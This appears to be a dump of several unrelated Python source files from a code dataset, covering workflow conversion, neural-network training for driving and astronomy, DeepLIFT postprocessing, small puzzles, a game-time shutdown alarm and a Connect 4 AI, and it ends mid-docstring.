self.get_prepare_command(oozie_node=self.oozie_node, params=self.params)\n\n _, self.hdfs_files = self.file_extractor.parse_node()\n _, self.hdfs_archives = self.archive_extractor.parse_node()\n\n self.java_jar = self._get_or_default(self.oozie_node, SPARK_TAG_JAR, None, params=self.params)\n self.java_class = self._get_or_default(self.oozie_node, SPARK_TAG_CLASS, None, params=self.params)\n if self.java_class and self.java_jar:\n self.dataproc_jars = [self.java_jar]\n self.java_jar = None\n self.job_name = self._get_or_default(self.oozie_node, SPARK_TAG_JOB_NAME, None, params=self.params)\n\n job_xml_nodes = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_JOB_XML)\n\n for xml_file in job_xml_nodes:\n tree = ET.parse(source=xml_file.text)\n self.properties.update(self._parse_config_node(tree.getroot()))\n\n config_nodes = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_CONFIGURATION)\n if config_nodes:\n self.properties.update(self._parse_config_node(config_nodes[0]))\n\n spark_opts = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_OPTS)\n if spark_opts:\n self.properties.update(self._parse_spark_opts(spark_opts[0]))\n\n app_args = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_ARGS)\n for arg in app_args:\n self.application_args.append(el_utils.replace_el_with_var(arg.text, self.params, quote=False))\n\n @staticmethod\n def _get_or_default(root: ET.Element, tag: str, default: str = None, params: Dict[str, str] = None):\n \"\"\"\n If a node exists in the oozie_node with the tag specified in tag, it\n will attempt to replace the EL (if it exists) with the corresponding\n variable. If no EL var is found, it just returns text. However, if the\n tag is not found under oozie_node, then return default. If there are\n more than one with the specified tag, it uses the first one found.\n \"\"\"\n var = xml_utils.find_nodes_by_tag(root, tag)\n\n if var:\n # Only check the first one\n return el_utils.replace_el_with_var(var[0].text, params=params, quote=False)\n return default\n\n @staticmethod\n def _parse_config_node(config_node: ET.Element) -> Dict[str, str]:\n conf_dict = {}\n for prop in config_node:\n name_node = prop.find(SPARK_TAG_NAME)\n value_node = prop.find(SPARK_TAG_VALUE)\n if name_node is not None and name_node.text and value_node is not None and value_node.text:\n conf_dict[name_node.text] = value_node.text\n return conf_dict\n\n @staticmethod\n def _parse_spark_opts(spark_opts_node: ET.Element):\n \"\"\"\n Some examples of the spark-opts element:\n --conf key1=value\n --conf key2=\"value1 value2\"\n \"\"\"\n conf: Dict[str, str] = {}\n if spark_opts_node.text:\n spark_opts = spark_opts_node.text.split(\"--\")[1:]\n else:\n raise ParseException(\"Spark opts node has no text: {}\".format(spark_opts_node))\n clean_opts = [opt.strip() for opt in spark_opts]\n clean_opts_split = [opt.split(maxsplit=1) for opt in clean_opts]\n\n for spark_opt in clean_opts_split:\n # Can have multiple \"--conf\" in spark_opts\n if spark_opt[0] == \"conf\":\n key, _, value = spark_opt[1].partition(\"=\")\n # Value is required\n if not value:\n raise ParseException(\n f\"Incorrect parameter format. Expected format: key=value. Current value: {spark_opt}\"\n )\n # Delete surrounding quotes\n if len(value) > 2 and value[0] in [\"'\", '\"'] and value:\n value = value[1:-1]\n conf[key] = value\n\n return conf\n\n def _get_tasks(self):\n \"\"\"\n Returns the list of Airflow tasks that are the result of mapping\n\n :return: list of Airflow tasks\n \"\"\"\n action_task = Task(\n task_id=self.name,\n template_name=\"spark.tpl\",\n trigger_rule=self.trigger_rule,\n template_params=dict(\n main_jar=self.java_jar,\n main_class=self.java_class,\n arguments=self.application_args,\n archives=self.hdfs_archives,\n files=self.hdfs_files,\n job_name=self.job_name,\n dataproc_spark_properties=self.properties,\n dataproc_spark_jars=self.dataproc_jars,\n ),\n )\n\n if not self.has_prepare(self.oozie_node):\n return [action_task]\n\n prepare_task = Task(\n task_id=self.name + \"_prepare\",\n template_name=\"prepare.tpl\",\n template_params=dict(prepare_command=self.prepare_command),\n )\n return [prepare_task, action_task]\n\n def _get_relations(self):\n \"\"\"\n Returns the list of Airflow relations that are the result of mapping\n\n :return: list of relations\n \"\"\"\n return (\n [Relation(from_task_id=self.name + \"_prepare\", to_task_id=self.name)]\n if self.has_prepare(self.oozie_node)\n else []\n )\n\n def to_tasks_and_relations(self):\n tasks = self._get_tasks()\n relations = self._get_relations()\n return tasks, relations\n\n def required_imports(self) -> Set[str]:\n # Bash are for the potential prepare statement\n return {\n \"from airflow.contrib.operators import dataproc_operator\",\n \"from airflow.operators import bash_operator\",\n \"from airflow.operators import dummy_operator\",\n }\n\n @property\n def first_task_id(self):\n return self._get_tasks()[0].task_id\n","sub_path":"o2a/mappers/spark_mapper.py","file_name":"spark_mapper.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"154193333","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nfrom torchvision import datasets, transforms\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport argparse\r\nimport time\r\nimport os\r\nfrom dataset_loader import DrivingDataset\r\nfrom driving_policy import OriginalDrivingPolicyDropOut, RecurrentNetworkDropOut, AttentionNetworkDropOut, RecurrentAttentionDropOut\r\nfrom driving_policy import OriginalDrivingPolicy, RecurrentNetwork, AttentionNetwork, RecurrentAttention\r\nfrom utils import DEVICE, str2bool\r\nimport matplotlib.pyplot as plt\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--lr\", type=float, help=\"learning rate\", default=1e-3)\r\n parser.add_argument(\"--n_epochs\", type=int, help=\"number of epochs\", default=50)\r\n parser.add_argument(\"--batch_size\", type=int, help=\"batch_size\", default=256)\r\n parser.add_argument(\"--n_steering_classes\", type=int, help=\"number of steering classes\", default=20)\r\n parser.add_argument(\"--train_dir\", help=\"directory of training data\", default='./dataset/train')\r\n parser.add_argument(\"--validation_dir\", help=\"directory of validation data\", default='./dataset/val')\r\n parser.add_argument(\"--weights_out_file\", help=\"where to save the weights of the network e.g. ./weights/learner_0.weights\",\r\n required=True)\r\n parser.add_argument(\"--weighted_loss\", type=str2bool,\r\n help=\"should you weight the labeled examples differently based on their frequency of occurence\",\r\n default=False)\r\n parser.add_argument(\"--policy\", type=str, default='OriginalDrivingPolicy',\r\n help=\"driving policy of choice e.g. OriginalDrivingPolicy, RecurrentNetwork, AttentionNetwork or RecurrentAttention\")\r\n parser.add_argument(\"--output_log\", type=str2bool, help=\"whether to output network logs\", default=False)\r\n parser.add_argument(\"--is_l2\", type=str2bool, help=\"whether to do L2 regularization\", default=False)\r\n parser.add_argument(\"--wd\", type=float, help=\"weight decay rate\", default=0.0005)\r\n parser.add_argument(\"--is_dropout\", type=str2bool, help=\"whether to use Drop Out Regularization\", default=False)\r\n return parser\r\n\r\n\r\ndef train_discrete(model, iterator, opt, args):\r\n model.train()\r\n\r\n\r\n loss_hist = []\r\n\r\n params = model.state_dict\r\n\r\n # Do one pass over the data accessed by the training iterator\r\n # Upload the data in each batch to the GPU (if applicable)\r\n # Zero the accumulated gradient in the optimizer\r\n # Compute the cross_entropy loss with and without weights\r\n # Compute the derivatives of the loss w.r.t. network parameters\r\n # Take a step in the approximate gradient direction using the optimizer opt\r\n print(\"Trainining Full Driving Policy Network...\")\r\n for i_batch, batch in enumerate(iterator):\r\n x = batch['image']\r\n y = batch['cmd']\r\n\r\n x = x.to(DEVICE)\r\n y = y.to(DEVICE)\r\n\r\n\r\n if (args.weighted_loss == True):\r\n class_weights = torch.FloatTensor(args.class_dist).cuda()\r\n criterion = nn.CrossEntropyLoss(weight=class_weights)\r\n else:\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n #\r\n # YOUR CODE GOES HERE\r\n\r\n pred = model(x)\r\n opt.zero_grad()\r\n loss = criterion(pred,y)\r\n loss.backward()\r\n opt.step()\r\n\r\n #\r\n\r\n loss = loss.detach().cpu().numpy()\r\n loss_hist.append(loss)\r\n PRINT_INTERVAL = int(len(iterator) / 3)\r\n if (i_batch + 1) % PRINT_INTERVAL == 0:\r\n print ('\\tIter [{}/{} ({:.0f}%)]\\tLoss: {}\\t Time: {:10.3f}'.format(\r\n i_batch, len(iterator),\r\n i_batch / len(iterator) * 100,\r\n np.asarray(loss_hist)[-PRINT_INTERVAL:].mean(0),\r\n time.time() - args.start_time,\r\n ))\r\n\r\n # I added this\r\n avg_loss = np.asarray(loss_hist).mean()\r\n return avg_loss\r\n\r\ndef accuracy(y_pred, y_true):\r\n \"y_true is (batch_size) and y_pred is (batch_size, K)\"\r\n _, y_max_pred = y_pred.max(1)\r\n correct = ((y_true == y_max_pred).float()).mean()\r\n acc = correct * 100\r\n return acc\r\n\r\n\r\ndef test_discrete(model, iterator, opt, args):\r\n model.train()\r\n\r\n acc_hist = []\r\n\r\n for i_batch, batch in enumerate(iterator):\r\n x = batch['image']\r\n y = batch['cmd']\r\n\r\n x = x.to(DEVICE)\r\n y = y.to(DEVICE)\r\n logits = model(x)\r\n y_pred = F.softmax(logits, 1)\r\n acc = accuracy(y_pred, y)\r\n acc = acc.detach().cpu().numpy()\r\n acc_hist.append(acc)\r\n\r\n avg_acc = np.asarray(acc_hist).mean()\r\n\r\n\r\n print ('\\tVal: \\tAcc: {} Time: {:10.3f}'.format(\r\n avg_acc,\r\n time.time() - args.start_time,\r\n ))\r\n\r\n return avg_acc\r\n\r\ndef get_class_distribution(iterator, args):\r\n class_dist = np.zeros((args.n_steering_classes,), dtype=np.float32)\r\n for i_batch, batch in enumerate(iterator):\r\n y = batch['cmd'].detach().numpy().astype(np.int32)\r\n class_dist[y] += 1\r\n\r\n return (class_dist / sum(class_dist))\r\n\r\n\r\n\r\ndef main(args,driving_policy=None):\r\n train_loss = []\r\n test_acc = []\r\n\r\n data_transform = transforms.Compose([ transforms.ToPILImage(),\r\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\r\n transforms.RandomRotation(degrees=80),\r\n transforms.ToTensor()])\r\n\r\n training_dataset = DrivingDataset(root_dir=args.train_dir,\r\n categorical=True,\r\n classes=args.n_steering_classes,\r\n transform=data_transform)\r\n\r\n validation_dataset = DrivingDataset(root_dir=args.validation_dir,\r\n categorical=True,\r\n classes=args.n_steering_classes,\r\n transform=data_transform)\r\n\r\n training_iterator = DataLoader(training_dataset, batch_size=args.batch_size, shuffle=True, num_workers=1)\r\n validation_iterator = DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, num_workers=1)\r\n if (driving_policy == None):\r\n print(\"New policy instantiated.\")\r\n if args.policy == 'OriginalDrivingPolicy':\r\n driving_policy = OriginalDrivingPolicy(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentNetwork':\r\n driving_policy = RecurrentNetwork(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'AttentionNetwork':\r\n driving_policy = AttentionNetwork(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentAttention':\r\n driving_policy = RecurrentAttention(n_classes=args.n_steering_classes).to(DEVICE)\r\n\r\n if args.policy == 'OriginalDrivingPolicyDropOut':\r\n driving_policy = OriginalDrivingPolicyDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentNetworkDropOut':\r\n driving_policy = RecurrentNetworkDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'AttentionNetworkDropOut':\r\n driving_policy = AttentionNetworkDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentAttentionDropOut':\r\n driving_policy = RecurrentAttentionDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n args.freeze_last_n_layers = 0\r\n\r\n if args.is_l2:\r\n # Adding weight decay with the weight decay problem fixed with AdamW\r\n opt = torch.optim.AdamW(filter(lambda p: p.requires_grad, driving_policy.parameters()), lr=args.lr, weight_decay=args.wd)\r\n else:\r\n opt = torch.optim.Adam(filter(lambda p: p.requires_grad, driving_policy.parameters()), lr=args.lr)\r\n args.start_time = time.time()\r\n\r\n args.class_dist = get_class_distribution(training_iterator, args)\r\n\r\n best_val_accuracy = 0\r\n for epoch in range(args.n_epochs):\r\n print ('EPOCH ', epoch)\r\n\r\n curr_train_loss = train_discrete(driving_policy, training_iterator, opt, args)\r\n train_loss.append(curr_train_loss)\r\n\r\n curr_val_accuracy = test_discrete(driving_policy, validation_iterator, opt, args)\r\n\r\n if (curr_val_accuracy > best_val_accuracy):\r\n best_val_accuracy = curr_val_accuracy\r\n torch.save(driving_policy.state_dict(), args.weights_out_file)\r\n test_acc.append(best_val_accuracy)\r\n else:\r\n test_acc.append(curr_val_accuracy)\r\n\r\n if args.is_l2:\r\n if args.output_log:\r\n train_log = './logs/{}_Loss_weight_decay.txt'.format(args.policy)\r\n test_log = './logs/{}_Acc_weight_decay.txt'.format(args.policy)\r\n\r\n with open(train_log, 'w') as f_train:\r\n for loss in train_loss:\r\n f_train.write(str(loss) + '\\n')\r\n with open(test_log, 'w') as f_test:\r\n for accuracy in test_acc:\r\n f_test.write(str(accuracy) + '\\n')\r\n\r\n elif args.is_dropout:\r\n if args.output_log:\r\n train_log = './logs/{}_Loss_drop_out.txt'.format(args.policy)\r\n test_log = './logs/{}_Acc_drop_out.txt'.format(args.policy)\r\n\r\n with open(train_log, 'w') as f_train:\r\n for loss in train_loss:\r\n f_train.write(str(loss) + '\\n')\r\n with open(test_log, 'w') as f_test:\r\n for accuracy in test_acc:\r\n f_test.write(str(accuracy) + '\\n')\r\n else:\r\n if args.output_log:\r\n train_log = './logs/{}_Loss.txt'.format(args.policy)\r\n test_log = './logs/{}_Acc.txt'.format(args.policy)\r\n\r\n with open(train_log, 'w') as f_train:\r\n for loss in train_loss:\r\n f_train.write(str(loss) + '\\n')\r\n with open(test_log, 'w') as f_test:\r\n for accuracy in test_acc:\r\n f_test.write(str(accuracy) + '\\n')\r\n\r\n\r\n return driving_policy, train_loss, test_acc\r\n\r\nif __name__ == \"__main__\":\r\n parser = parse_args()\r\n args = parser.parse_args()\r\n\r\n main(args)\r\n","sub_path":"train_policy.py","file_name":"train_policy.py","file_ext":"py","file_size_in_byte":10365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52716858","text":"## template\n\nimport sys\n\ndef reverser(unit):\n global matrix\n \n idx_r=unit-1\n # print(matrix[idx_r])\n for idx,val in enumerate(matrix[idx_r]):\n # print(val)\n if(val==0):\n # print('ck')\n matrix[idx_r][idx]=1\n else:\n matrix[idx_r][idx]=0\n # print(matrix[idx_r])\n \n matrix=list(map(list,zip(*matrix)))\n # print(*matrix,sep='\\n')\n \n idx_c=unit-1\n for idx,val in enumerate(matrix[idx_c]):\n if( val == 0):\n matrix[idx_c][idx]=1\n else:\n matrix[idx_c][idx]=0\n \n # common\n if(matrix[idx_r][idx_c]==0):\n matrix[idx_r][idx_c]=1\n else:\n matrix[idx_r][idx_c]=0\n \n matrix=list(map(list,zip(*matrix)))\n \n\nif __name__==\"__main__\":\n N=int(sys.stdin.readline().strip())\n matrix=[]\n \n for _ in range(10):\n row=list(map(int, sys.stdin.readline().split()))\n matrix.append(row)\n \n units=[i for i in range(1,N+1)]\n \n # 행단위 칼럼단위하고 공통영역 재반복\n # 로봇으로 좌표\n # 둘다 스텝은 같지만 구현에서 차이\n \n # 파이썬에��� 행렬은 트랜스포스트 이용하자\n \n # (행,열,공통)단위\n \n for unit in units:\n reverser(unit)\n \n for row in matrix:\n print(' '.join(map(str,row)))\n ","sub_path":"Algorithm/python/algorithmjobs/review/L031_15reversematrix2.py","file_name":"L031_15reversematrix2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"150924679","text":"'''\nIf you are using a GPU, write the following in ~/.theanorc.\n[global]\ndevice=gpu\nfloatX=float32\n[blas]\nldflags=-lopenblas\n[cuda]\nroot=/opt/apps/cuda/7.0\n[nvcc]\nfastmath=True\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport time\nimport cPickle as pickle\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\n\nimport lasagne\nfrom lasagne import layers\nfrom lasagne.updates import nesterov_momentum\nfrom lasagne.objectives import squared_error\nfrom lasagne.objectives import categorical_crossentropy\nfrom lasagne.nonlinearities import leaky_rectify\nfrom lasagne.init import Orthogonal, Constant\nfrom nolearn.lasagne import NeuralNet\nfrom nolearn.lasagne import BatchIterator\nfrom lasagne.nonlinearities import softmax\n\nfrom sklearn import neighbors\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.utils import check_random_state\n\nfrom astropy.io import fits\nfrom astropy import wcs\n\nimport bmc\n\nX_init = np.load(\"/work/04323/thrush/data/train/X.npy\")\ny_init = np.load(\"/work/04323/thrush/data/train/y.npy\")\n\nX_small = X_init[:70000] #Added to cut down run time\ny_small = y_init[:70000] #This too\n\ndef renormalize(array): \n return (array - array.min()) /(array.max() - array.min())\n\nfor i in range(5):\n X_small[:,i,:,:] = renormalize(X_small[:,i,:,:])\n\ny_small = renormalize(y_small)\n\nprint(\"X_init type = {}, y_init type = {}\".format(type(X_small), type(y_small)))\n\nX, X_test, y, y_test = train_test_split(X_small, y_small, test_size = 0.2, random_state=24)\n\nprint(\"X.shape = {}, X.min = {}, X.max = {}\".format(X.shape, X.min(), X.max()))\n\nprint(\"y.shape = {}, y.min = {}, y.max = {}\".format(y.shape, y.min(), y.max()))\n\n#def renormalize(array):\n# return (array - array.min()) / (array.max() - array.min())\n\n#for i in range(5):\n# X[:, i, :, :] = renormalize(X[:, i, :, :])\n\nX = X.astype(np.float32)\n \ny = y.astype(np.float32)\n\nprint(\"X.shape = {}, X.min = {}, X.max = {}\".format(X.shape, X.min(), X.max()))\nprint(\"y.shape = {}, y.min = {}, y.max = {}\".format(y.shape, y.min(), y.max()))\n\ndef compute_PCA(array):\n\n nimages0, nchannels0, height0, width0 = array.shape\n rolled = np.transpose(array, (0, 2, 3, 1))\n # transpose from N x channels x height x width to N x height x width x channels\n nimages1, height1, width1, nchannels1 = rolled.shape\n # check shapes\n assert nimages0 == nimages1\n assert nchannels0 == nchannels1\n assert height0 == height1\n assert width0 == width1\n # flatten\n reshaped = rolled.reshape(nimages1 * height1 * width1, nchannels1)\n \n from sklearn.decomposition import PCA\n \n pca = PCA()\n pca.fit(reshaped)\n \n cov = pca.get_covariance()\n \n eigenvalues, eigenvectors = np.linalg.eig(cov)\n \n return eigenvalues, eigenvectors\n\n\nclass AugmentedBatchIterator(BatchIterator):\n \n def __init__(self, batch_size, crop_size=8, testing=False):\n super(AugmentedBatchIterator, self).__init__(batch_size)\n self.crop_size = crop_size\n self.testing = testing\n\n def transform(self, Xb, yb):\n\n Xb, yb = super(AugmentedBatchIterator, self).transform(Xb, yb)\n batch_size, nchannels, width, height = Xb.shape\n \n if self.testing:\n if self.crop_size % 2 == 0:\n right = left = self.crop_size // 2\n else:\n right = self.crop_size // 2\n left = self.crop_size // 2 + 1\n X_new = Xb[:, :, right: -left, right: -left]\n return X_new, yb\n\n eigenvalues, eigenvectors = compute_PCA(Xb)\n\n # Flip half of the images horizontally at random\n indices = np.random.choice(batch_size, batch_size // 2, replace=False) \n Xb[indices] = Xb[indices, :, :, ::-1]\n\n # Crop images\n X_new = np.zeros(\n (batch_size, nchannels, width - self.crop_size, height - self.crop_size),\n dtype=np.float32\n )\n\n for i in range(batch_size):\n # Choose x, y pixel posiitions at random\n px, py = np.random.choice(self.crop_size, size=2)\n \n sx = slice(px, px + width - self.crop_size)\n sy = slice(py, py + height - self.crop_size)\n \n # Rotate 0, 90, 180, or 270 degrees at random\n nrotate = np.random.choice(4)\n \n # add random color perturbation\n alpha = np.random.normal(loc=0.0, scale=0.5, size=5)\n noise = np.dot(eigenvectors, np.transpose(alpha * eigenvalues))\n \n for j in range(nchannels):\n X_new[i, j] = np.rot90(Xb[i, j, sx, sy] + noise[j], k=nrotate)\n \n return X_new, yb\n\n\nclass SaveParams(object):\n\n def __init__(self, name):\n self.name = name\n\n def __call__(self, nn, train_history):\n if train_history[-1][\"valid_loss_best\"]:\n nn.save_params_to(\"{}.params\".format(self.name))\n with open(\"{}.history\".format(self.name), \"wb\") as f:\n pickle.dump(train_history, f)\n\nclass UpdateLearningRate(object):\n\n def __init__(self, start=0.001, stop=0.0001):\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, nn, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, nn.max_epochs)\n\n epoch = train_history[-1]['epoch']\n new_value = np.float32(self.ls[epoch - 1])\n getattr(nn, \"update_learning_rate\").set_value(new_value)\n\nclass TrainSplit(object):\n\n def __init__(self, eval_size):\n self.eval_size = eval_size\n\n def __call__(self, X, y, net):\n if self.eval_size:\n X_train, y_train = X[:-self.eval_size], y[:-self.eval_size]\n X_valid, y_valid = X[-self.eval_size:], y[-self.eval_size:]\n else:\n X_train, y_train = X, y\n X_valid, y_valid = _sldict(X, slice(len(y), None)), y[len(y):]\n\n return X_train, X_valid, y_train, y_valid\n\nnet = NeuralNet(\n layers=[\n ('input', layers.InputLayer),\n\n ('conv11', layers.Conv2DLayer),\n ('pool1', layers.MaxPool2DLayer),\n\n ('conv21', layers.Conv2DLayer),\n ('conv22', layers.Conv2DLayer),\n ('pool2', layers.MaxPool2DLayer),\n\n ('conv31', layers.Conv2DLayer),\n ('conv32', layers.Conv2DLayer),\n ('pool3', layers.MaxPool2DLayer),\n\n ('hidden4', layers.DenseLayer),\n ('dropout4', layers.DropoutLayer),\n \n ('hidden5', layers.DenseLayer),\n ('dropout5', layers.DropoutLayer),\n\n ('output', layers.DenseLayer),\n ],\n input_shape=(None, 5, 44, 44),\n \n conv11_num_filters=32, conv11_filter_size=(5, 5), \n pool1_pool_size=(2, 2),\n\n conv21_num_filters=64, conv21_filter_size=(3, 3),\n conv22_num_filters=64, conv22_filter_size=(3, 3),\n pool2_pool_size=(2, 2),\n\n conv31_num_filters=128, conv31_filter_size=(3, 3),\n conv32_num_filters=128, conv32_filter_size=(3, 3),\n pool3_pool_size=(2, 2),\n\n hidden4_num_units=2048,\n dropout4_p=0.5,\n \n hidden5_num_units=2048,\n dropout5_p=0.5,\n\n output_num_units=1,\n output_nonlinearity=None,\n\n update_learning_rate=0.0001,\n update_momentum=0.9,\n\n objective_loss_function=squared_error,\n regression=True,\n max_epochs=1000,\n batch_iterator_train=AugmentedBatchIterator(batch_size=128, crop_size=4),\n batch_iterator_test=AugmentedBatchIterator(batch_size=128, crop_size=4, testing=True),\n \n on_epoch_finished=[SaveParams(\"net\")],\n\n verbose=2,\n )\n\n\nnet.fit(X, y)\n\ntrain_loss = [row['train_loss'] for row in net.train_history_]\nvalid_loss = [row['valid_loss'] for row in net.train_history_]\n\nnp.save(\"/work/04323/thrush/train_loss.npy\", train_loss)\nnp.save(\"/work/04323/thrush/valid_loss.npy\", valid_loss)\n \nbest_valid_loss = min([row['valid_loss'] for row in net.train_history_])\nprint(\"Best valid loss: {}\".format(best_valid_loss))\n\n#for i in range(5):\n# X_test[:, i, :, :] = (X_test[:,i,:,:] - X[:,i,:,:].min())/(X[:,i,:,:].max() - X[:,i,:,:].min())#renormalize(X_test[:, i, :, :])\n\nX_test = X_test.astype(np.float32)\n#y_test = (y_test - y.min())/(y.max() - y.min()) #renormalize(y_test).astype(np.float32)\n\ny_test = y_test.astype(np.float32)\ny_pred = net.predict(X_test)\n\nnp.save(\"/work/04323/thrush/sdss_convnet_pred.npy\", y_pred)\nnp.save(\"/work/04323/thrush/y_test.npy\",y_test)\n\nfrom sklearn.metrics import mean_squared_error\nprint(\"Mean squared error:\")\nprint(mean_squared_error(y_test, y_pred))\n\nfrom sklearn.metrics import r2_score\nprint(\"R2 score:\")\nprint(r2_score(y_test, y_pred))\n\nfrom sklearn.metrics import median_absolute_error\nprint(\"Median absolute error:\")\nprint(median_absolute_error(y_test, y_pred))\nprint(\"Testing set done.\")\n","sub_path":"shallowNN/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":8871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"162667762","text":"'''\nPostprocessing on deeplift importance scores\nAuthor: Anna G. Green\n\n'''\nfrom __future__ import print_function\nimport warnings\nimport glob\nimport sparse\nimport numpy as np\nimport pandas as pd\n\n# Read in phenotype data\ndf_geno_pheno = pd.read_pickle(\"../focus_cnn/multitask_geno_pheno_train_test.pkl\")\ndf_geno_pheno = df_geno_pheno.query(\"category=='set1_original_10202'\")\ndf_geno_pheno = df_geno_pheno.reset_index(drop=True)\n\nprint(len(df_geno_pheno))\n# Get lis of all output files\noutput_files = glob.glob(\"output/*npz\")\n\n# For each file (each drug)\nfor file in output_files:\n\n # sparse load\n scores = sparse.load_npz(file)\n drug = file.split(\"/\")[-1].split(\"_\")[0]\n\n # get only the resistant strains\n print(file, drug, scores.shape)\n subset_df_geno_pheno = df_geno_pheno.loc[np.logical_or(df_geno_pheno[drug]==\"R\", df_geno_pheno[drug]==\"S\"),:].reset_index(drop=True)\n resistant_strains = subset_df_geno_pheno.loc[df_geno_pheno[drug]==\"R\",:].index\n\n if len(resistant_strains)==0:\n continue\n\n assert len(subset_df_geno_pheno) == scores.shape[0]\n\n # take only isolates that are resistant\n scores_subset = scores[resistant_strains, :, :].todense()\n print(\"shape of the scores\", scores_subset.shape)\n\n # Take max, median, and mean of saliency at each position\n max_score = np.max(np.abs(scores_subset), axis=0)\n median_score = np.median(scores_subset, axis=0)\n mean_score = np.mean(scores_subset, axis=0)\n\n # save to file\n np.save(f\"output/{drug}_max.npy\", max_score)\n np.save(f\"output/{drug}_median.npy\", median_score)\n np.save(f\"output/{drug}_mean.npy\", mean_score)\n","sub_path":"sd_cnn/deeplift/02.deeplift_models_to_mean.py","file_name":"02.deeplift_models_to_mean.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502078196","text":"#coding:utf-8\n#适用于Windows8.1及以上\nimport win32com.client as wc\nimport time, os\ns = wc.Dispatch(\"SAPI.SpVoice\")\ns.Speak(\"You have 30 minutes to play Assassin's Creed 2\")\ntime.sleep(600)\ns.Speak(\"20 minutes left\")\ntime.sleep(600)\ns.Speak(\"10 minutes left\")\ntime.sleep(540)\ns.Speak(\"Your computer will shut down in 1 minute, you should quit the game.\")\nfor i in range(50):\n s.Speak(str(50-i))\n time.sleep(1)\ntime.sleep(9)\nS.sPEAK(\"Now system is going to shutdown\")\nos.system(\"shutdown /h /t 60\")","sub_path":"voice/alarm.pyw","file_name":"alarm.pyw","file_ext":"pyw","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"187384582","text":"import random\ndef rand11():\n return random.randint(1, 11) \n\ndef solution():\n i = rand11()\n j = rand11()\n while i > 10: #i is in range of 1-10\n i = rand11()\n while j > 6: #j is in range of 1-6\n j = rand11()\n \n if i % 2 == 0: #if i is even return 1-6\n return j\n else: #if is is odd return 7-13\n return j + 7\n\nprint('rand13() returns ', solution())\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"114800944","text":"import numpy as np\nfrom numpy import inf\nimport time\n\n\n# Bitstring representation of 6x7 connect 4 game\nclass Board:\n\n def __init__(self, player_number, board_matrix=None):\n self.player = 0 # this player's pieces\n self.opponent = 0 # opponent's pieces\n self.player_number = player_number\n self.opponent_number = 1 if player_number == 2 else 2\n\n if board_matrix is not None:\n player, opponent = '', ''\n for col in range(6, -1, -1):\n player += '0'\n opponent += '0'\n for row in range(0, 6):\n player += '1' if board_matrix[row, col] == self.player_number else '0'\n opponent += '1' if board_matrix[row, col] == self.opponent_number else '0'\n self.player = int(player, 2)\n self.opponent = int(opponent, 2)\n\n # Return array of non-full columns\n def valid_moves(self):\n mask = self.player | self.opponent\n moves = []\n for col in range(7):\n if (mask & (1 << ((col * 7) + 5))) == 0:\n moves.append(col)\n return moves\n\n # Return new Board with a `player_number` piece in column `col`\n def move(self, col, player_number):\n new = Board(self.player_number)\n mask = self.player | self.opponent\n mask |= mask + (1 << (col * 7))\n if player_number == self.player_number:\n new.player = self.opponent ^ mask \n new.opponent = self.opponent\n else:\n new.player = self.player\n new.opponent = self.player ^ mask\n return new\n\n # Get piece at (`row`, `col`)\n # def get(self, row, col):\n # select = 1 << ((col * 7) + 5 - row)\n # if self.player & select != 0: return self.player_number\n # if self.opponent & select != 0: return self.opponent_number\n # return 0\n\n def is_end(self):\n\n # Board is full\n if (self.player | self.opponent) == 279258638311359: # this number represents the value of a full bitboard\n return 0\n \n # Check 4 in a row\n for p, n in [ (self.player, self.player_number), (self.opponent, self.opponent_number) ]:\n # This strategy for checking 4 in a row is borrowed from:\n # https://medium.com/@gillesvandewiele/creating-the-perfect-connect-four-ai-bot-c165115557b0\n \n # Horizontal -\n m = p & (p >> 7)\n if m & (m >> 14):\n return n\n # Diagonal \\\n m = p & (p >> 6)\n if m & (m >> 12):\n return n\n # Diagonal /\n m = p & (p >> 8)\n if m & (m >> 16):\n return n\n # Vertical |\n m = p & (p >> 1)\n if m & (m >> 2):\n return n\n\n return 0\n\n\nclass AIPlayer:\n\n def __init__(self, player_number):\n self.player_number = player_number\n self.opponent_number = 1 if player_number == 2 else 2\n self.type = 'ai'\n self.player_string = 'Player {}:ai'.format(player_number)\n\n def get_alpha_beta_move(self, board):\n \"\"\"\n Given the current state of the board, return the next move based 